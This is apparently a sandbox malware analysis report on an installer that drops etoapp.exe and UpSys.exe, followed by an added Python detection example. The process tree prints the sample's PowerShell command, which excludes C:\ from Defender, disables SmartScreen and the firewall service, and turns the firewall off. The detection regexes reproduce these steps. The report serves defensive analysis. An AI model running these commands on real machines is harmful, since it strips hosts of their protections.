Analysis

max time kernel: 155s
max time network: 140s
platform: windows10_x64
resource: win10-en-20211014
submitted: 15-10-2021 13:53

Static task: static1
Behavioral task: behavioral1
Sample: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe
Resource: win10-en-20211014

General

Target: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe
Size: 6.0MB
MD5: 5a41f52a595d7b83c3576f09fb7736fa
SHA1: 7c3420961acf1fc77533aec0d9e006316c69938f
SHA256: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33
SHA512: 890916f451bfbeb3d81be521da5184c5f3f912f13663d4e32fb06b56b015c7fd052d3d981f0d035a1f3b416d767bef647d641551f8b5c14ec5c5aed6dbeff548
Malware Config
Signatures

Modifies security service 2 TTPs 1 IoCs
MpsSvc is the Windows Defender Firewall service; a Start value of 4 is SERVICE_DISABLED, so the firewall service will not come back at the next boot (the netsh command in the process tree turns it off immediately for the current session).
Processes:
- Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" (powershell.exe)

Downloads MZ/PE file

Executes dropped EXE 4 IoCs
Processes (pid process):
- 2132 etoapp.exe
- 680 UpSys.exe
- 380 UpSys.exe
- 428 UpSys.exe
Modifies Windows Firewall 1 TTPs

Loads dropped DLL 12 IoCs
Processes (pid process, number of entries):
- 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe (3)
- 908 MsiExec.exe (2)
- 1168 MsiExec.exe (6)
- 2132 etoapp.exe (1)
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe (PID 2336) and the two msiexec.exe instances (PIDs 4080 and 812). Every entry is "File opened (read-only)"; drive letters are listed in the order the sandbox recorded them.
- 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe (23 entries): \??\B: \??\H: \??\J: \??\E: \??\R: \??\G: \??\P: \??\T: \??\A: \??\F: \??\I: \??\K: \??\X: \??\M: \??\S: \??\N: \??\Y: \??\O: \??\Q: \??\Z: \??\L: \??\U: \??\W:
- msiexec.exe (41 entries; the report does not separate the two msiexec.exe processes, so several letters appear twice): \??\E: \??\N: \??\A: \??\W: \??\S: \??\M: \??\Q: \??\B: \??\L: \??\E: \??\R: \??\K: \??\X: \??\Z: \??\T: \??\U: \??\S: \??\U: \??\H: \??\Y: \??\I: \??\O: \??\J: \??\O: \??\V: \??\N: \??\V: \??\Y: \??\I: \??\K: \??\M: \??\R: \??\B: \??\L: \??\A: \??\T: \??\G: \??\H: \??\P: \??\Q: \??\Z:
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Drops file in System32 directory 1 IoCs
Processes:
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (powershell.exe)
C:\Windows\system32\config\systemprofile is the profile directory of the LocalSystem account, so the PowerShell instance that wrote this file is running as SYSTEM. That matches the parentage in the process tree: msiexec.exe /V (the Windows Installer service, PID 812) starts etoapp.exe (PID 2132), which starts powershell.exe (PID 3852).

Drops file in Windows directory 13 IoCs
Processes (all msiexec.exe):
- File opened for modification C:\Windows\Installer\MSI997.tmp
- File created C:\Windows\Installer\f75f84b.msi
- File opened for modification C:\Windows\Installer\f75f84b.msi
- File opened for modification C:\Windows\Installer\MSIFCEF.tmp
- File opened for modification C:\Windows\Installer\MSIFE19.tmp
- File opened for modification C:\Windows\Installer\MSIFF43.tmp
- File created C:\Windows\Installer\inprogressinstallinfo.ipi
- File created C:\Windows\Installer\SourceHash{C858BEE1-39B7-49DA-9974-0F78D311CE8D}
- File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
- File opened for modification C:\Windows\Installer\MSIFE97.tmp
- File opened for modification C:\Windows\Installer\MSI1.tmp
- File opened for modification C:\Windows\Installer\MSI159.tmp
- File opened for modification C:\Windows\Installer\
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies data under HKEY_USERS 52 IoCs
Processes: powershell.exe and UpSys.exe. Every key below is under \REGISTRY\USER\.DEFAULT\Software\ (the .DEFAULT hive is the one loaded for the LocalSystem account, consistent with the SYSTEM-level chain above). The SystemCertificates and WinTrust keys are the empty per-user certificate-store skeleton that CryptoAPI creates on first use under a profile, and the ZoneMap values are the ones WinINet writes when it initialises the zone map; they show first-time crypto and network use as SYSTEM rather than tampering in themselves.
powershell.exe (47 entries):
- Key created Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created Microsoft\SystemCertificates\CA\CRLs
- Key created Microsoft\SystemCertificates\Disallowed\CRLs
- Key created Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Key created Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created Microsoft\SystemCertificates\Root\CRLs
- Key created Microsoft\SystemCertificates\SmartCardRoot
- Key created Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Set value (data) Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000
- Key created Microsoft\SystemCertificates\SmartCardRoot\CRLs
- Key created Microsoft\SystemCertificates\TrustedPeople
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Key created Policies\Microsoft\SystemCertificates\CA\Certificates
- Key created Microsoft\SystemCertificates\Disallowed\CTLs
- Key created Microsoft\SystemCertificates\Root\CTLs
- Key created Microsoft\SystemCertificates\Root
- Key created Microsoft\SystemCertificates\Root\Certificates
- Key created Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created Policies\Microsoft\SystemCertificates\CA\CTLs
- Key created Microsoft\SystemCertificates\Disallowed
- Key created Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created Microsoft\SystemCertificates\trust
- Key created Policies\Microsoft\SystemCertificates\trust\CRLs
- Key created Policies\Microsoft\SystemCertificates\trust\CTLs
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Key created Microsoft\SystemCertificates\CA\CTLs
- Key created Microsoft\SystemCertificates\Disallowed\Certificates
- Key created Microsoft\SystemCertificates\trust\CRLs
- Key created Microsoft\SystemCertificates\CA
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Microsoft\SystemCertificates\trust\CTLs
- Key created Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created Microsoft\SystemCertificates\trust\Certificates
- Key created Policies\Microsoft\SystemCertificates\trust
- Key created Microsoft\SystemCertificates\CA\Certificates
- Key created Policies\Microsoft\SystemCertificates\CA
- Key created Policies\Microsoft\SystemCertificates\Disallowed
UpSys.exe (5 entries):
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Key created Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\

Modifies system certificate store
The two AuthRoot entries written below are the public DigiCert Assured ID Root CA (thumbprint 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43) and AAA Certificate Services (thumbprint D1EB23A46D17D68FD92564C2F1F1601764D8E349) roots; both subject names are readable in the DER inside the blobs. Writing well-known roots into AuthRoot is what the root-store auto-update does when a signature chain is verified, not installation of an attacker-controlled root, so this signature alone is not evidence of a trust-store compromise.
Processes:
211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exeetoapp.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d03
25aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff0404
03020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 etoapp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 
5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b5
47c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e etoapp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid process, number of entries):
- 812 msiexec.exe (2)
- 3852 powershell.exe (3)
- 2132 etoapp.exe (48)
- 680 UpSys.exe (4)
- 380 UpSys.exe (4)
- 1044 powershell.exe (3)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- 812 msiexec.exe: Token: SeSecurityPrivilege
- 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe: Token: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (this 29-privilege sequence is recorded twice in full and a third time up to SeMachineAccountPrivilege before the 64-entry cap)
Requesting every named privilege in one pass is the "enable everything" pattern commonly seen in installer executables. AdjustTokenPrivileges can only enable privileges the token already holds, so requests such as SeTcbPrivilege or SeCreateTokenPrivilege fail silently for an administrator token; the list shows what was asked for, not what was obtained.

Suspicious use of FindShellTrayWindow 2 IoCs
Processes (pid process, number of entries):
- 4080 msiexec.exe (2)

Suspicious use of WriteProcessMemory 19 IoCs
Processes (source PID wrote to memory of target process, number of entries):
- 812 msiexec.exe -> 908 MsiExec.exe (3)
- 2336 211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe -> 4080 msiexec.exe (3)
- 812 msiexec.exe -> 1168 MsiExec.exe (3)
- 812 msiexec.exe -> 2132 etoapp.exe (2)
- 2132 etoapp.exe -> 3852 powershell.exe (2)
- 3852 powershell.exe -> 680 UpSys.exe (2)
- 3852 powershell.exe -> 1756 netsh.exe (2)
- 428 UpSys.exe -> 1044 powershell.exe (2)
Processes
-
[level 1] C:\Users\Admin\AppData\Local\Temp\211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe"
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[level 2] C:\Windows\SysWOW64\msiexec.exe
Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634313060 " AI_EUIMSI=""
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
[level 1] C:\Windows\system32\msiexec.exe
Command line: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[level 2] C:\Windows\syswow64\MsiExec.exe
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 70AEBB05607C76E9DB50EC10B88C30E8 C
- Loads dropped DLL
-
[level 2] C:\Windows\syswow64\MsiExec.exe
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 9CFC858CB9C49993E52168ED471F1B34
- Loads dropped DLL
-
[level 2] C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe
Command line: "C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe"
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(exit)
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[level 4] C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
[level 5] C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
[level 6] C:\ProgramData\UpSys.exe
Command line: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
[level 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
[level 4] C:\Windows\system32\netsh.exe
Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
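The PowerShell command launched by etoapp.exe in the tree above is the part of this chain a defender needs to recognise: it adds a Microsoft Defender exclusion for the whole C: drive, sets EnableSmartScreen to 0, sets the Windows Firewall service (mpssvc) to Start=4 (disabled) and then switches every firewall profile off through netsh. The Python below is an added example, not part of the sandbox report, showing how command-line rules plus a parent-chain check pick this sequence out of process-creation telemetry. The records are constructed for the example from the PIDs, images and command lines in this report (parent/child links taken from its "wrote to memory of" entries), not real logs, and the rule names are ours.

```python
import re

# Constructed process-creation records in the shape a Sysmon Event ID 1 or
# Security 4688 event provides. PIDs, images and command lines are transcribed
# from the process tree in this report; parent links come from its "wrote to
# memory of" entries. This is a transcription for the example, not real telemetry.
EVENTS = [
    {"pid": 812, "ppid": 0,
     "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 2132, "ppid": 812,
     "image": r"C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe"'},
    {"pid": 3852, "ppid": 2132,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                 r"C:\ProgramData\UpSys.exe /SW:0 powershell.exe "
                 r"$(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); "
                 r"$(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System "
                 r"–Name EnableSmartScreen -PropertyType DWord -Value 0); "
                 r"$(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc "
                 r"-Name Start -Value 4); "
                 r"$(netsh advfirewall set allprofiles state off); $(exit)")},
    {"pid": 680, "ppid": 3852,
     "image": r"C:\ProgramData\UpSys.exe",
     "cmdline": r'"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe'},
    {"pid": 1756, "ppid": 3852,
     "image": r"C:\Windows\system32\netsh.exe",
     "cmdline": r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off'},
]

# Command-line rules (names are ours). Each matches one defence-evasion step
# from the chain above and fires on its own, so a variant that drops one step
# still produces the others.
RULES = {
    "defender_exclusion_added":
        re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "defender_exclusion_is_drive_root":
        re.compile(r'-ExclusionPath\s+"?[A-Za-z]:\\"?(?=[\s);,]|$)', re.I),
    "smartscreen_disabled":
        re.compile(r"EnableSmartScreen.*-Value\s+0\b", re.I),
    "firewall_service_disabled":
        re.compile(r"\\mpssvc\b.*-Name\s+Start\s+-Value\s+4\b", re.I),
    "firewall_profiles_off":
        re.compile(r"advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
}

# Parent images under these directories are user-writable, which is where the
# dropped installer payload lives in this report.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData)\\", re.I)


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def ancestry(pid, events):
    """Image basenames from the process up through every recorded ancestor."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        event = by_pid[pid]
        chain.append(event["image"].rsplit("\\", 1)[-1].lower())
        pid = event["ppid"]
    return chain


def analyze(events):
    """Map pid -> findings. Besides the command-line rules, flags powershell.exe
    whose parent image lives under a user-writable directory."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for event in events:
        hits = match_rules(event["cmdline"])
        parent = by_pid.get(event["ppid"])
        if (parent is not None
                and event["image"].lower().endswith("powershell.exe")
                and USER_WRITABLE.search(parent["image"])):
            hits.append("powershell_spawned_from_user_writable_path")
        if hits:
            findings[event["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, " <- ".join(ancestry(pid, EVENTS)))
        for hit in hits:
            print("   ", hit)
```

The drive-root rule is kept separate from the generic exclusion rule on purpose: administrators do add narrow Defender exclusions, but an exclusion for `C:\` is almost never legitimate, so the two deserve different severities. The ancestry walk is what turns five individual hits into one story (powershell.exe started by etoapp.exe started by msiexec.exe), which is the context an analyst needs before acting on the alert.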
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MSIEADF.tmp
MD5 3d24a2af1fb93f9960a17d6394484802
